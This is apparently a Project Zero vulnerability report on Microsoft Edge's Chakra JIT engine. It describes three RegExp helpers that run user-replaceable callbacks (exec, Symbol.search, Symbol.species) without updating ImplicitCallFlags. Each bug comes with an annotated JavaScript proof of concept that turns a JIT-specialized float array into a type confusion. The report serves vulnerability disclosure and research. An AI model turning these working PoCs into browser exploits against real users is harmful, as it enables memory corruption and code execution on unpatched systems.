Microsoft Edge: Chakra: JIT: Multiple ImplicitCallFlags update bugs with RegExp
The same bug class as <a href="/p/project-zero/issues/detail?id=1334" title="Microsoft Edge: Chakra: JIT: RegexHelper::StringReplace must call the callback function with updating ImplicitCallFlags" class="closed_ref" rel="nofollow">issue 1334</a> (MSRC-40170): a RegExp helper invokes user-controllable JavaScript (a replaced `exec`, a `Symbol.search` hook, a `Symbol.species` constructor) without recording an implicit call in ImplicitCallFlags. The JIT-compiled caller therefore has no way to learn that arbitrary script ran in the middle of it and keeps its type-specialized assumptions about `arr`. In each PoC below the callback stores an object into what the JIT presumably still treats as a float array, so the following specialized double store writes raw floating-point bits into a slot that is now read as a Var — a type confusion.
1. Calling the RegExp's (user-replaceable) `exec` method without updating the "ImplicitCallFlags" flag in "JavascriptRegExp::CallExec".
// PoC 1 victim function. After the warm-up loop in main() this is expected to
// be JIT-compiled with `arr` specialized as an array of doubles.
function opt(arr, re) {
  // Double store; presumably makes the JIT assume a float-array layout for arr.
  arr[0] = 1.1;
  // String.prototype.match ends up in JavascriptRegExp::CallExec, which calls
  // the (hijacked, see main) re.exec without setting ImplicitCallFlags — so
  // the JIT'd code is never told that user script ran here.
  'a'.match(re);
  // Second double store. If the callback changed arr to hold objects but the
  // JIT still uses the float-array store, the raw bits of this denormal are
  // written into a slot that is now interpreted as a Var.
  arr[0] = 2.3023e-320;
}
// PoC 1 driver: warm up opt() so it is JIT-compiled, then hijack re.exec so the
// next call runs user code inside the regex helper.
function main() {
  // All-double array so opt() is specialized for float element storage.
  let arr = [1.1, 2.2, 3.3];
  let re = /a/;
  // Warm-up; 0x2000 iterations is the count used to get opt() JIT-compiled.
  for (let i = 0; i < 0x2000; i++) {
    opt(arr, re);
  }
  // Own-property exec overrides RegExp.prototype.exec for this regex. The
  // callback converts arr to an object (Var) array behind the JIT's back.
  re.exec = function () {
    arr[0] = {};
    return null;
  };
  opt(arr, re);
  // print() is the Chakra host shell (ch) builtin; not available in Node or a browser.
  print(arr[0]);
}
main(); // run PoC 1
2. Calling the RegExp's (user-replaceable) `[Symbol.search]` method without updating the "ImplicitCallFlags" flag in "JavascriptString::CallRegExFunction".
// PoC 2 victim function; same shape as PoC 1, but the unguarded user call is
// reached through String.prototype.search instead of match.
function opt(arr, re) {
  // Double store; presumably makes the JIT assume a float-array layout for arr.
  arr[0] = 1.1;
  // String.prototype.search goes through JavascriptString::CallRegExFunction,
  // which invokes re[Symbol.search] (hijacked in main) without setting
  // ImplicitCallFlags.
  let r = 'a'.search(re);
  // Second double store; if arr was changed to a Var array by the callback,
  // the specialized float store writes raw double bits into a Var slot.
  arr[0] = 2.3023e-320;
}
// PoC 2 driver: warm up opt(), then install a user-defined Symbol.search hook.
function main() {
  // All-double array so opt() is specialized for float element storage.
  let arr = [1.1, 2.2, 3.3];
  let re = /a/;
  // Warm-up so opt() is JIT-compiled.
  for (let i = 0; i < 0x2000; i++) {
    opt(arr, re);
  }
  // Own-property Symbol.search shadows RegExp.prototype[Symbol.search]; the
  // callback converts arr to an object (Var) array and returns a valid index.
  re[Symbol.search] = function () {
    arr[0] = {};
    return 0;
  };
  opt(arr, re);
  // print() is the Chakra host shell (ch) builtin; not available in Node or a browser.
  print(arr[0]);
}
main(); // run PoC 2
3. Calling the constructor obtained through `re.constructor[Symbol.species]` without updating the "ImplicitCallFlags" flag in "RegexHelper::RegexEs6SplitImpl".
// PoC 3 victim function; the unguarded user call is the Symbol.species
// constructor looked up by String.prototype.split.
function opt(arr, re) {
  // Double store; presumably makes the JIT assume a float-array layout for arr.
  arr[0] = 1.1;
  // split with a RegExp reaches RegexHelper::RegexEs6SplitImpl, which
  // constructs the species object (user function installed in main) without
  // setting ImplicitCallFlags.
  'a'.split(re);
  // Second double store; if arr was changed to a Var array by the callback,
  // the specialized float store writes raw double bits into a Var slot.
  arr[0] = 2.3023e-320;
}
// PoC 3 driver: warm up opt(), then make re.constructor[Symbol.species] a
// user function so the species lookup in split runs attacker script.
function main() {
  // All-double array so opt() is specialized for float element storage.
  let arr = [1.1, 2.2, 3.3];
  let re = /a/;
  // Warm-up so opt() is JIT-compiled.
  for (let i = 0; i < 0x2000; i++) {
    opt(arr, re);
  }
  // Own-property constructor with a Symbol.species function: split's species
  // lookup calls it. The callback converts arr to an object (Var) array and
  // returns a real RegExp so split can continue normally.
  re.constructor = {
    [Symbol.species]: function () {
      arr[0] = {};
      return /a/;
    }
  };
  opt(arr, re);
  // print() is the Chakra host shell (ch) builtin; not available in Node or a browser.
  print(arr[0]);
}
main(); // run PoC 3
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt